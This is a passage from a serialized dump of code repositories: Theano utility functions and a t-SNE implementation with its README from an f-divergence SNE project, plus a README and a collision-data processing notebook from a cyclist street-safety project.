n_hid)\n W = np.zeros((n_vis, n_hid), dtype=theano.config.floatX)\n for i in xrange(N_):\n temp = 0.01 * numpy_rng.normal(size=(sz, sz)).astype(theano.config.floatX)\n W[:, i*sz:(i+1)*sz] = sp.linalg.orth(temp)\n\n\n return theano.shared(value = np.cast[theano.config.floatX](W), name=W_name)\n\n\n\ndef init_uniform(shape, rng, scale=0.05, name='W'):\n\n return theano.shared(rng.uniform(low=-scale, high=scale, size=shape).astype('float32'), name=name)\n\n\n'''Initialize the bias'''\ndef initialize_bias(n, b_name):\n\n return theano.shared(value = np.cast[theano.config.floatX](np.zeros((n,)), \\\n dtype=theano.config.floatX), name=b_name)\n\n\ndef init_zero(shape, dtype=theano.config.floatX, name=None):\n return theano.shared(np.zeros(shape, dtype='float32'), name=name)\n\n\n'''Convolve Gaussian filters'''\ndef convolve2D(F1,F2, Z): \n\n Fz = (F1.dimshuffle([0,1,2,'x']) * Z.dimshuffle([0,'x',1,2])).sum(axis=-2)\n FzF = (Fz.dimshuffle([0,1,2,'x']) * F2.dimshuffle([0,'x',1,2])).sum(axis=-2)\n\n return FzF\n\n\n\ndef unpickle(path):\n ''' For cifar-10 data, it will return dictionary'''\n #Load the cifar 10\n f = open(path, 'rb')\n data = cPickle.load(f)\n f.close()\n return data \n\n\ndef share_input(x):\n return theano.shared(np.asarray(x, dtype=theano.config.floatX))\n\n\ndef shared_dataset(data_xy):\n \"\"\" Function that loads the dataset into shared variables\n\n The reason we store our dataset in shared variables is to allow\n Theano to copy it into the GPU memory (when code is run on GPU).\n Since copying data into the GPU is slow, copying a minibatch everytime\n is needed (the default behaviour if the data is not in a shared\n variable) would lead to a large decrease in performance.\n \"\"\"\n\n data_x, data_y = data_xy\n shared_x = theano.shared(np.asarray(data_x, dtype=theano.config.floatX))\n shared_y = theano.shared(np.asarray(data_y, dtype=theano.config.floatX))\n #When storing data on the GPU it has to be stored as floats\n # therefore we will store the labels as ``floatX`` as well\n # (``shared_y`` does exactly that). But during our computations\n # we need them as ints (we use labels as index, and if they are\n # floats it doesn't make sense) therefore instead of returning\n # ``shared_y`` we will have to cast it to int. This little hack\n # lets us get around this issue\n\n return shared_x, T.cast(shared_y, 'int32')\n\n\ndef repmat_tensor(x,k):\n\n return T.tile(x.dimshuffle([0,1, 2,'x']), [1,1,1,k])\n\n\ndef repmat_vec(x,k):\n\n return T.tile(x.dimshuffle([0,'x']), [1,k]).T\n\n\ndef activation_fn_th(X,atype='sigmoid', leak_thrd=0.2):\n '''collection of useful activation functions'''\n\n if atype == 'softmax':\n return T.nnet.softmax(X)\n elif atype == 'sigmoid':\n return T.nnet.sigmoid(X)\n elif atype == 'tanh':\n return T.tanh(X)\n elif atype == 'softplus':\n return T.nnet.softplus(X)\n elif atype == 'relu':\n return (X + abs(X)) / 2.0\n elif atype == 'linear':\n return X\n elif atype =='leaky':\n f1 = 0.5 * (1 + leak_thrd)\n f2 = 0.5 * (1 - leak_thrd)\n return f1 * X + f2 * abs(X)\n elif atype == 'elu': \n return T.switch(X > 0, X, T.expm1(X))\n elif atype =='selu':\n alpha = 1.6732632423543772848170429916717\n scale = 1.0507009873554804934193349852946\n return scale*T.where(X>=0.0, X, alpha*T.switch(X > 0, X, T.expm1(X)))\n\n\n\n\ndef save_the_weight(x,fname):\n '''save pickled weights'''\n f = file(fname+'.save', 'wb')\n cPickle.dump(x, f, protocol=cPickle.HIGHEST_PROTOCOL)\n print(\"saved!\")\n f.close()\n \n\ndef save_the_numpy_params(model,size,rank,epoch, model_path):\n \n tmp = []\n\n for param in model.gen_network.params:\n if rank==0: print param.get_value().shape\n tmp.append(param.get_value())\n\n np.save(model_path+'/%d%dgen_params_e%d.npy' % (size, rank, epoch),tmp)\n\n # comm.Barrier()\n print 'saved'\n # exit(0)\n \n\n'''Display the data.\ndata - n_dim X 3 , n_dim = dim_x * dim_y '''\ndef display_data(data, img_sz, RGB_flag=False, ):\n if RGB_flag:\n \tpic = data.reshape(img_sz[0],img_sz[1],3)\n else:\n pic = data.reshape(img_sz[0],img_sz[1])\n\n plt.figure()\n plt.imshow(pic, cmap='gray')\n\n\n'''Display dataset as a tiles'''\ndef display_dataset(data, patch_sz, tile_shape, scale_rows_to_unit_interval=False, \\\n binary=False, i=1, fname='dataset'):\n\n x = tile_raster_images(data, img_shape=patch_sz, \\\n \t\t\t\t\t\ttile_shape=tile_shape, tile_spacing=(1,1), output_pixel_vals=False, scale_rows_to_unit_interval=scale_rows_to_unit_interval)\n \n if binary:\n \tx[x==1] = 255\t\t\n\n ## For MNIST\n if fname != None:\n plt.figure()\n plt.imshow(x,cmap='gray')\n plt.axis('off')\n plt.savefig(fname+'.png', bbox_inches='tight')\n else:\n plt.figure()\n plt.imshow(x,cmap='gray')\n plt.axis('off')\n plt.show(block=True)\n \n\ndef scale_to_unit_interval(ndar, eps=1e-8):\n \"\"\" Scales all values in the ndarray ndar to be between 0 and 1 \"\"\"\n ndar = ndar.copy()\n ndar -= ndar.min()\n ndar *= 1.0 / (ndar.max() + eps)\n return ndar\n\n\ndef tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),\n scale_rows_to_unit_interval=False,\n output_pixel_vals=True):\n \"\"\"\nTransform an array with one flattened image per row, into an array in\nwhich images are reshaped and layed out like tiles on a floor.\n\nThis function is useful for visualizing datasets whose rows are images,\nand also columns of matrices for transforming those rows\n(such as the first layer of a neural net).\n\n:type X: a 2-D ndarray or a tuple of 4 channels, elements of which can\nbe 2-D ndarrays or None;\n:param X: a 2-D array in which every row is a flattened image.\n\n:type img_shape: tuple; (height, width)\n:param img_shape: the original shape of each image\n\n:type tile_shape: tuple; (rows, cols)\n:param tile_shape: the number of images to tile (rows, cols)\n\n:param output_pixel_vals: if output should be pixel values (i.e. int8\nvalues) or floats\n\n:param scale_rows_to_unit_interval: if the values need to be scaled before\nbeing plotted to [0,1] or not\n\n\n:returns: array suitable for viewing as an image.\n(See:`PIL.Image.fromarray`.)\n:rtype: a 2-d array with same dtype as X.\n\n\"\"\"\n\n assert len(img_shape) == 2\n assert len(tile_shape) == 2\n assert len(tile_spacing) == 2\n\n # The expression below can be re-written in a more C style as\n # follows :\n #\n # out_shape = [0,0]\n # out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -\n # tile_spacing[0]\n # out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -\n # tile_spacing[1]\n out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp\n in zip(img_shape, tile_shape, tile_spacing)]\n\n if isinstance(X, tuple):\n assert len(X) == 4\n # Create an output numpy ndarray to store the image\n if output_pixel_vals:\n out_array = np.zeros((out_shape[0], out_shape[1], 4),\n dtype='uint8')\n else:\n out_array = np.zeros((out_shape[0], out_shape[1], 4),\n dtype=X[0].dtype)\n\n #colors default to 0, alpha defaults to 1 (opaque)\n if output_pixel_vals:\n channel_defaults = [0, 0, 0, 255]\n else:\n channel_defaults = [0., 0., 0., 1.]\n\n for i in xrange(4):\n if X[i] is None:\n # if channel is None, fill it with zeros of the correct\n # dtype\n dt = out_array.dtype\n if output_pixel_vals:\n dt = 'uint8'\n out_array[:, :, i] = np.zeros(out_shape,\n dtype=dt) + channel_defaults[i]\n else:\n # use a recurrent call to compute the channel and store it\n # in the output\n out_array[:, :, i] = tile_raster_images(\n X[i], img_shape, tile_shape, tile_spacing,\n scale_rows_to_unit_interval, output_pixel_vals)\n return out_array\n\n else:\n # if we are dealing with only one channel\n H, W = img_shape\n Hs, Ws = tile_spacing\n\n # generate a matrix to store the output\n dt = X.dtype\n if output_pixel_vals:\n dt = 'uint8'\n out_array = np.zeros(out_shape, dtype=dt)\n\n for tile_row in xrange(tile_shape[0]):\n for tile_col in xrange(tile_shape[1]):\n\t\t#print tile_row, tile_shape[1], tile_col, X.shape[0]\n\t\t#print tile_row * tile_shape[1] + tile_col < X.shape[0]\n if tile_row * tile_shape[1] + tile_col < X.shape[0]:\n this_x = X[tile_row * tile_shape[1] + tile_col]\n\t\t #print this_x\n\t\t #print scale_rows_to_unit_interval\n if scale_rows_to_unit_interval:\n # if we should scale values to be between 0 and 1\n # do this by calling the `scale_to_unit_interval`\n # function\n this_img = scale_to_unit_interval(\n this_x.reshape(img_shape))\n\t\t\t#print this_x.shape\n\t\t\t#print this_img\n else:\n this_img = this_x.reshape(img_shape)\n # add the slice to the corresponding position in the\n # output array\n\t\t\t#print this_x.shape\n\t\t\t#print this_img\n\n c = 1\n if output_pixel_vals:\n c = 255\n out_array[\n tile_row * (H + Hs): tile_row * (H + Hs) + H,\n tile_col * (W + Ws): tile_col * (W + Ws) + W\n ] = this_img * c\n return out_array\n\ndef corrupt_input(rng, input, corruption_level, ntype='gaussian'):\n\n return input + rng.normal(size = input.shape, loc = 0.0,\n scale= corruption_level)\n\n\n\ndef get_corrupted_input(rng, input, corruption_level, ntype='zeromask'):\n ''' depending on requirement, returns input corrupted by zeromask/gaussian/salt&pepper'''\n MRG = RNG_MRG.MRG_RandomStreams(rng.randint(2 ** 30))\n #theano_rng = RandomStreams()\n if corruption_level == 0.0:\n return input\n\n if ntype=='zeromask':\n return MRG.binomial(size=input.shape, n=1, p=1-corruption_level,dtype=theano.config.floatX) * input\n elif ntype=='gaussian':\n return input + MRG.normal(size = input.shape, avg = 0.0,\n std = corruption_level, dtype = theano.config.floatX)\n elif ntype=='salt_pepper':\n\n # salt and pepper noise\n print 'DAE uses salt and pepper noise'\n a = MRG.binomial(size=input.shape, n=1,\\\n p=1-corruption_level,dtype=theano.config.floatX)\n b = MRG.binomial(size=input.shape, n=1,\\\n p=corruption_level,dtype=theano.config.floatX)\n\n c = T.eq(a,0) * b\n return input * a + c\n\n''' improving learning rate'''\ndef get_epsilon_inc(epsilon, n, i):\n \"\"\"\n n: total num of epoch\n i: current epoch num\n \"\"\"\n return epsilon / ( 1 - i/float(n))\n\n'''decaying learning rate'''\ndef get_epsilon(epsilon, n, i):\n \"\"\"\n n: total num of epoch\n i: current epoch num\n \"\"\"\n return epsilon / ( 1 + i/float(n))\n\ndef get_epsilon_decay(i, num_epoch, constant=4): \n c = np.log(num_epoch/2)/ np.log(constant)\n return 10.**(1-(i-1)/(float(c)))\n\n\n'''Given tiles of raw data, this function will return training, validation, and test sets.\nr_train - ratio of train set\nr_valid - ratio of valid set\nr_test - ratio of test set'''\ndef gen_train_valid_test(raw_data, raw_target, r_train, r_valid, r_test):\n N = raw_data.shape[0]\n perms = np.random.permutation(N)\n raw_data = raw_data[perms,:]\n raw_target = raw_target[perms]\n\n tot = float(r_train + r_valid + r_test) #Denominator\n p_train = r_train / tot #train data ratio\n p_valid = r_valid / tot #valid data ratio\n p_test = r_test / tot\t #test data ratio\n \n n_raw = raw_data.shape[0] #total number of data\t\t\n n_train =int( math.floor(n_raw * p_train)) # number of train\n n_valid =int( math.floor(n_raw * p_valid)) # number of valid\n n_test =int( math.floor(n_raw * p_test) ) # number of test\n\n \n train = raw_data[0:n_train, :]\n valid = raw_data[n_train:n_train+n_valid, :]\n test = raw_data[n_train+n_valid: n_train+n_valid+n_test,:]\n \n train_target = raw_target[0:n_train]\n valid_target = raw_target[n_train:n_train+n_valid]\n test_target = raw_target[n_train+n_valid: n_train+n_valid+n_test]\n \n print 'Among ', n_raw, 'raw data, we generated: '\n print train.shape[0], ' training data'\n print valid.shape[0], ' validation data'\n print test.shape[0], ' test data\\n'\n \n train_set = [train, train_target]\n valid_set = [valid, valid_target]\n test_set = [test, test_target]\n return [train_set, valid_set, test_set]\n\n\ndef dist2hy(x,y):\n '''Distance matrix computation\n Hybrid of the two, switches based on dimensionality\n '''\n\n d = T.dot(x,y.T)\n d *= -2.0\n d += T.sum(x*x, axis=1).dimshuffle(0,'x')\n d += T.sum(y*y, axis=1)\n\n # Rounding errors occasionally cause negative entries in d\n d = d * T.cast(d>0,theano.config.floatX)\n\n return d\n\n\ndef dist2hy_np(x,y):\n '''Distance matrix computation\n Hybrid of the two, switches based on dimensionality\n '''\n\n d = np.dot(x,y.T)\n d *= -2.0\n d += np.sum(x*x, axis=1)[:,None]\n d += np.sum(y*y, axis=1)\n\n # Rounding errors occasionally cause negative entries in d\n d = d * np.asarray(d>0,'float32')\n\n return np.sqrt(d)\n\n\ndef save_the_env(dir_to_save, path):\n \n import fnmatch\n import os\n\n matches = []\n for root, dirnames, filenames in os.walk(dir_to_save):\n for extension in ('*.py', '*.sh'):\n for filename in fnmatch.filter(filenames, extension):\n matches.append(os.path.join(root, filename))\n \n # print matches\n \n # print 'creating archive'\n import tarfile\n out = tarfile.open('env.tar', mode='w')\n \n try:\n # print 'adding files into tar'\n for f in matches:\n out.add(f)\n except Exception as e:\n raise e\n\n # print 'closing'\n out.close()\n \n import shutil\n tar_to_save = 'env.tar'\n \n shutil.copy2(tar_to_save, path)\n" }, { "alpha_fraction": 0.5916301012039185, "alphanum_fraction": 0.602429986000061, "avg_line_length": 39.390907287597656, "blob_id": "ddc2fbbf9a024acb7815af8a9cd2027bd0fc2246", "content_id": "4f19add697e25f209302262af8dcb1ff75b6eb3e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8889, "license_type": "permissive", "max_line_length": 99, "num_lines": 220, "path": "/tsne.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "\"\"\"\nCode taken from https://github.com/hma02/thesne/blob/master/model/tsne.py\nAnd then modified.\n\"\"\"\nimport os, sys\nimport numpy as np\nimport theano\nimport theano.tensor as T\n\nfrom sklearn.utils import check_random_state\n\nfrom core import kl_cost_var, reverse_kl_cost_var, js_cost_var, \\\n hellinger_cost_var, chi_square_cost_var, \\\n p_Yp_Y_var_np, floath, find_sigma\n\nfrom utils import get_epsilon\nfrom utils_sne import precision_K, K_neighbours, neighbour_accuracy_K, plot_map_c, plot_map_news\n\n\ndef tsne(X, perplexity=30, Y=None, output_dims=2, n_epochs=1000,\n initial_lr=1000, final_lr=50, lr_switch=250, init_stdev=1e-3,\n sigma_iters=50, initial_momentum=0.95, final_momentum=0.0, lrDecay=100,\\\n momentum_switch=250, metric='euclidean', random_state=None,\n verbose=1, fname=None, color=None, divtype='kl', num_folds=2, datatype='mnist'):\n \"\"\"Compute projection from a matrix of observations (or distances) using \n t-SNE.\n \n Parameters\n ----------\n X : array-like, shape (n_observations, n_features), \\\n or (n_observations, n_observations) if `metric` == 'precomputed'.\n Matrix containing the observations (one per row). If `metric` is \n 'precomputed', pairwise dissimilarity (distance) matrix.\n \n perplexity : float, optional (default = 30)\n Target perplexity for binary search for sigmas.\n \n Y : array-like, shape (n_observations, output_dims), optional \\\n (default = None)\n Matrix containing the starting position for each point.\n \n output_dims : int, optional (default = 2)\n Target dimension.\n \n n_epochs : int, optional (default = 1000)\n Number of gradient descent iterations.\n \n initial_lr : float, optional (default = 2400)\n The initial learning rate for gradient descent.\n \n final_lr : float, optional (default = 200)\n The final learning rate for gradient descent.\n \n lr_switch : int, optional (default = 250)\n Iteration in which the learning rate changes from initial to final.\n This option effectively subsumes early exaggeration.\n \n init_stdev : float, optional (default = 1e-4)\n Standard deviation for a Gaussian distribution with zero mean from\n which the initial coordinates are sampled.\n \n sigma_iters : int, optional (default = 50)\n Number of binary search iterations for target perplexity.\n \n initial_momentum : float, optional (default = 0.5)\n The initial momentum for gradient descent.\n \n final_momentum : float, optional (default = 0.8)\n The final momentum for gradient descent.\n \n momentum_switch : int, optional (default = 250)\n Iteration in which the momentum changes from initial to final.\n \n metric : 'euclidean' or 'precomputed', optional (default = 'euclidean')\n Indicates whether `X` is composed of observations ('euclidean') \n or distances ('precomputed').\n \n random_state : int or np.RandomState, optional (default = None)\n Integer seed or np.RandomState object used to initialize the\n position of each point. Defaults to a random seed.\n\n verbose : bool (default = 1)\n Indicates whether progress information should be sent to standard \n output.\n \n Returns\n -------\n Y : array-like, shape (n_observations, output_dims)\n Matrix representing the projection. Each row (point) corresponds to a\n row (observation or distance to other observations) in the input matrix.\n \"\"\"\n \n N = X.shape[0]\n X_shared = theano.shared(np.asarray(X, dtype=floath))\n sigma_shared = theano.shared(np.ones(N, dtype=floath))\n find_sigma(X_shared, sigma_shared, N, perplexity, sigma_iters, metric, verbose)\n\n sorted_ind_p, pdist = K_neighbours(X, sigma=sigma_shared.get_value(), maxK=10)\n rev_sorted_ind_p, pdist = K_neighbours(X, maxK=100, revF=True, sigma=sigma_shared.get_value())\n\n figs_path = './figs/'+datatype+'/'+divtype\n result_path = './results/'+datatype+'/'+divtype\n embedd_path = './embeddings/'+datatype+'/'+divtype\n if not os.path.exists(figs_path): os.makedirs(figs_path)\n if not os.path.exists(result_path): os.makedirs(result_path)\n if not os.path.exists(embedd_path): os.makedirs(embedd_path)\n np.save(result_path+'/'+datatype+'_probM_seed0_v2_perp'+str(perplexity), pdist)\n np.save(result_path+'/'+datatype+'_data_sorted_v2_seed0_perp'+str(perplexity), sorted_ind_p)\n\n for i in xrange(1,num_folds):\n print '%s FOLD %d' % (divtype, i)\n random_state = check_random_state(i)\n\n Y = random_state.normal(0, init_stdev, size=(N, output_dims))\n Y_shared = theano.shared(np.asarray(Y, dtype=floath))\n\n Y = find_Y(X_shared, Y_shared, sigma_shared, N, output_dims, \\\n n_epochs, initial_lr, final_lr, lr_switch, \\\n init_stdev, initial_momentum, final_momentum, \\\n momentum_switch, metric, sorted_ind_p, \\\n rev_sorted_ind_p, verbose, \\\n fname=fname+'_fold'+str(i), color=color, \\\n divtype=divtype, lrDecay=lrDecay, \\\n datatype=datatype)\n\n return Y\n\n\ndef find_Y(X_shared, Y_shared, sigma_shared, N, output_dims, n_epochs,\n initial_lr, final_lr, lr_switch, init_stdev, initial_momentum,\n final_momentum, momentum_switch, metric, sorted_ind_p, rev_sorted_ind_p,\\\n verbose=0, fname=None, color=None, divtype='kl', lrDecay=100,\\\n visLossF=0, naccuracyF=1, datatype='mnist'):\n\n \"\"\"Optimize cost wrt Y\"\"\"\n # Optimization hyperparameters\n initial_lr = np.array(initial_lr, dtype=floath)\n final_lr = np.array(final_lr, dtype=floath)\n initial_momentum = np.array(initial_momentum, dtype=floath)\n final_momentum = np.array(final_momentum, dtype=floath)\n\n lr = T.fscalar('lr')\n lr_shared = theano.shared(initial_lr)\n\n\n X = T.fmatrix('X')\n Y = T.fmatrix('Y')\n Yv = T.fmatrix('Yv')\n Yv_shared = theano.shared(np.zeros((N, output_dims), dtype=floath))\n\n sigma = T.fvector('sigma')\n momentum = T.fscalar('momentum')\n momentum_shared = theano.shared(initial_momentum)\n\n # Cost\n if divtype == 'kl':\n cost = kl_cost_var(X, Y, sigma, metric)\n elif divtype == 'rkl':\n cost = reverse_kl_cost_var(X, Y, sigma, metric)\n elif divtype == 'js':\n cost = js_cost_var(X, Y, sigma, metric)\n elif divtype == 'hl':\n cost = hellinger_cost_var(X, Y, sigma, metric)\n elif divtype == 'ch':\n cost = chi_square_cost_var(X, Y, sigma, metric)\n\n # Setting update for Y velocities\n grad_Y = T.grad(cost, Y)\n norm_gs = abs(grad_Y).sum()\n updates = [(Yv_shared, momentum*Yv - lr*grad_Y)]\n givens = {X: X_shared, sigma: sigma_shared, Y: Y_shared, Yv: Yv_shared}\n update_Yv = theano.function([lr, momentum], [cost, norm_gs], givens=givens, updates=updates)\n Y_len = T.mean(T.sum(Y**2, axis=1))\n\n # Setting update for Y\n get_y_i = theano.function([], Y, givens={Y: Y_shared})\n get_cost_i = theano.function([Y], cost, givens={X: X_shared, sigma: sigma_shared})\n givens = {Y: Y_shared, Yv: Yv_shared}\n updates = [(Y_shared, Y + Yv)]\n update_Y = theano.function([], Y_len, givens=givens, updates=updates)\n\n loss, gnorms = [], []\n for epoch in range(n_epochs):\n\n lrY = max(float(get_epsilon(initial_lr, lrDecay, epoch)), min(0.001, initial_lr))\n mom = float(get_epsilon(initial_momentum, lrDecay, epoch)) \\\n if epoch < momentum_switch else 0.85\n\n c, grad_len = update_Yv(lrY, mom)\n gnorms.append(grad_len)\n y_len = update_Y()\n loss.append(c)\n\n if verbose:\n projX = np.array(Y_shared.get_value())\n if epoch % 25 == 0 or epoch < 20:\n projX = np.array(Y_shared.get_value())\n np.save('./embeddings/'+fname, projX)\n\n ffname = './figs/'+fname+'_epoch'+str(epoch)+'.pdf'\n if datatype == 'sbow':\n color_dict = [\\\n 'lightblue', 'darkblue', \n 'indianred', 'darkred', 'red', 'magenta', 'hotpink',\n 'silver', 'darkgray', 'gray']\n\n\n plot_map_news(projX, color, color_dict, ffname)\n else:\n plot_map_c(projX, color, ffname)\n\n\n print 'Epoch %d, SNE J %f, |GS| %f, |Y| %f, LRY %f, MOM %f' \\\n % (epoch, c, grad_len, y_len, lrY, mom)\n\n\n np.save('./results/'+fname+'_loss', np.asarray(loss))\n np.save('./results/'+fname+'_gnorm', np.asarray(gnorms))\n\n return np.array(Y_shared.get_value())\n\n\n\n" }, { "alpha_fraction": 0.7061403393745422, "alphanum_fraction": 0.7373294234275818, "avg_line_length": 37.660377502441406, "blob_id": "36c5fa180916c34f44a78cf8e615a1e82b0e958b", "content_id": "d6baef87b0f062a761312090eaa4dcc16237a739", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2052, "license_type": "permissive", "max_line_length": 108, "num_lines": 53, "path": "/README.md", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "# Stochastic Neighbour Embedding under f-divergence \n\nPython (Theano) implementation of Stochastic Neighbour Embedding under f-divergence code provided \nby Daniel Jiwoong Im, Nakul Verma, Kristin Branson \n\nft-Stochastic Neighbour Embedding (ft-SNE) is f-divergence based loss criteria for t-SNE.\nThe main idea is that different f-divergence produce better low-dimensional visualizations \nfor different types of structure in data.\n\nFor more information, see \n```bibtex\n@article{Im2018,\n title={Stochastic Neighbour Embedding under f-divergence},\n author={Im, Daniel Jiwoong and Verma, Nakul and Branson, Kristin},\n year={2018}\n}\n```\nIf you use this in your research, we kindly ask that you cite the above arxiv paper.\n\n\n## Dependencies\nPackages\n* [numpy](http://www.numpy.org/)\n* [matplotlib](https://matplotlib.org/)\n* [sklearn](http://scikit-learn.org/stable/install.html/)\n* [Theano ('0.9.0.dev-c697eeab84e5b8a74908da654b66ec9eca4f1291')](http://deeplearning.net/software/theano/) \n\n\n## How to run\nEntry code for MNIST, MNIST1, FACE, NEWS\n```\n python ./main.py --datatype mnist --divtypet kl --perplexity 100\n python ./main.py --datatype mnist1 --divtypet rkl --perplexity 100\n python ./main.py --datatype face --divtypet rkl --perplexity 100\n python ./main.py --datatype news --divtypet kl --perplexity 100\n```\nEntry code for runninng your own data:\n```\n python ./run.py --divtypet kl --perplexity 100 --dataset_path [YOUR OWN DATADIR]\n```\nNote that the name of data and labels file must be in NumPy array \n(npy) file. Data and label file name should be data.npy (NxD matrix) and label.npy (Nx1 array),\nwhere N is number of data points, D is number of features (see line 44-45 in run.py for details).\n\n\n\n## Illustration \nft-SNE embeddings obtained with interpolated divergences \nbetween KL and RKL. The perpleixty for each row corresponds to 10, 100, and 500 respectively:\n\n![Image of cluster embedding](https://github.com/jiwoongim/ft-SNE/blob/master/blob_cropped.jpg)\n\n![Image of manifold embedding](https://github.com/jiwoongim/ft-SNE/blob/master/swiss_cropped.jpg)\n\n\n\n" } ]
7
srinitishkp/SumPalin
https://github.com/srinitishkp/SumPalin
01fabe73f36d7f370373fe17b085178ef8327b0f
e873d3e3c4156f23006092807e006dee8db6137b
fe0fc5425cb89da511bf4b9aa7562183a80edd9b
refs/heads/main
2023-08-02T14:47:43.234379
2021-10-03T07:15:49
2021-10-03T07:15:49
413,005,073
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5534290075302124, "alphanum_fraction": 0.5725677609443665, "avg_line_length": 23.153846740722656, "blob_id": "d89f636612e58937f100aacf3aac273118559f9e", "content_id": "a020ff549038b0cfac6a06d3b8bccf48c2d505ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 75, "num_lines": 26, "path": "/sumPalin.py", "repo_name": "srinitishkp/SumPalin", "src_encoding": "UTF-8", "text": "def rev(a):\n temp=a\n r=0\n rev=0\n while(a>0):\n r=a%10\n rev=rev*10+r\n a=int(a/10)\n return rev\ndef checkPalin(temp,rev): \n if(temp==rev):\n return True\n else :\n return False\nnum=int(input(\"Enter a 2 or 3 digit number:\"))\nprint(\"Initially sum is the given number:\")\nfor i in range(5):\n print(\"Current sum:\",num,\"Reverse:\",rev(num))\n num=num+rev(num)\n if(checkPalin(num,rev(num))):\n break\nprint(\"\\nFinal sum after loop:\",num,\"\\nFinal reverse after loop:\",rev(num))\nif(num==rev(num)):\n print(\"\\nPalindrome\")\nelse:\n print(\"\\nNot a palindrome\")" }, { "alpha_fraction": 0.7578125, "alphanum_fraction": 0.76171875, "avg_line_length": 62.5, "blob_id": "c0728a2eb6bc9a83d6a6621f3b0b00ce87432935", "content_id": "dbf28fade4f3f0bebc3c97998e47f1ea66e2094c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 256, "license_type": "no_license", "max_line_length": 107, "num_lines": 4, "path": "/README.md", "repo_name": "srinitishkp/SumPalin", "src_encoding": "UTF-8", "text": "# SumPalin\nget a three or two digit no. and add it to the reversed no. check whether the sum is palindrome if not \nadd it to the reversed sum again and check whether it is palin. continue until the sum is palin or stop if \nthe no. of iteration reaches 5\n \n" } ]
2
pokeritney/Safe_Street_Cyclist
https://github.com/pokeritney/Safe_Street_Cyclist
e59f800750b456d76429604458439d0ccf8c5df9
daed3480ec05484255c45535b89a26e41cd3818b
f29d725f11b7ae3e4d7e5af589aba6c6ee8001ef
refs/heads/master
2020-12-13T16:19:47.972129
2020-02-20T00:34:35
2020-02-20T00:34:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.6925418376922607, "avg_line_length": 35.55555725097656, "blob_id": "d44d0f90682281c604c35d3ba105c3baa9a1ebbc", "content_id": "02a6fb6abf532f98bfe6ce4a10519427f28164bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 657, "license_type": "no_license", "max_line_length": 97, "num_lines": 18, "path": "/team64final/CODE/Viz/README.txt", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "============Below is a draft for TA, feel free to add===========\n1. Navigate to the project directory, \nIn the command shell, run the following command\n$ python -m http.server\n\n2. This will set up a local host in your computer\nA local server address will appear in the shell, copy that address and paste it into your browser\nIn case no address is displayed, enter http://0.0.0.0:8000/index.html\nHit okay, you are then in Safe Street for Cyclist's interface\n\n\n=========Below is for team 64 members===========\n1. Use python to set up local host\n\n-Static - All static files\n -css style\n -res: data files to load in html file\n-Lib - d3 file folder" }, { "alpha_fraction": 0.48111391067504883, "alphanum_fraction": 0.5076285004615784, "avg_line_length": 21.415283203125, "blob_id": "d26c3e6c462d66e59e0ed6bbed866d71d836e788", "content_id": "d2f422d923183ef42bb6396abad6953c05bd874d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6751, "license_type": "no_license", "max_line_length": 122, "num_lines": 301, "path": "/Database/TransBase/st_collision_sgmt_level.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### This notebook shapes collision data to street segment level and compute all model features needed to the same level.\n\n# 1. Set-up\n\n# In[27]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import read_sql\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\npd.set_option('display.max_colwidth', -1)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\n# 2. load data \n\n# In[25]:\n\n\n# main table with case-level collision record\ndf = pd.read_csv('transbase_collision.csv')\n\n# mapping table with traffic volume for each street segment\ndf_2 = pd.read_csv('st_sgmt_trnsprtn.csv')\n\n\n# In[4]:\n\n\n# preview main table\n\ndf.head()\n\n\n# In[5]:\n\n\n# preview main table\n\ndf.describe()\n\n\n# In[31]:\n\n\n# select the cols we need\n\ndf_select = df[['case_id_pkey','cnn_sgmt_fkey', 'collision_severity', 'pcf_viol_category', 'road_cond_1']]\n\n\n# In[32]:\n\n\n# preview selected cols\n\ndf_select.head()\n\n\n# 3. Transform columns before aggregation\n# - step 1: frequency count of all the categorical variables needed\n# - step 2: convert categorical vars into numeric ones so that they can be agged down the line to segment level\n\n# In[ ]:\n\n\n# 3.1 collision_severity\n\n\n# In[21]:\n\n\ndf_select['collision_severity'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule\n\n# Injury (Other Visible) 4\n# Injury (Complaint of Pain) 3\n# Injury (Severe) 2 \n# Fatal 1\n\n\n# In[34]:\n\n\n# convert!\n\ndf_select['cs_injury_4'] = np.where(df_select['collision_severity'] == 'Injury (Other Visible)', 1, 0)\ndf_select['cs_injury_3'] = np.where(df_select['collision_severity'] == 'Injury (Complaint of Pain)', 1, 0)\ndf_select['cs_injury_2'] = np.where(df_select['collision_severity'] == 'Injury (Injury (Severe))', 1, 0)\ndf_select['cs_injury_1'] = np.where(df_select['collision_severity'] == 'Injury (Fatal)', 1, 0)\n\n\n# In[ ]:\n\n\n# 3.2 pcf_viol_category\n\n\n# In[23]:\n\n\ndf_select['pcf_viol_category'].value_counts()\n\n\n# In[ ]:\n\n\n# mapping rule: if associated with road attributes then 1 else 0 \n\n# Improper Turning 0\n# Automobile Right of Way 0\n# Unsafe Speed 0\n# Other Hazardous Violation 0\n# Traffic Signals and Signs 1\n# Wrong Side of Road 0\n# Improper 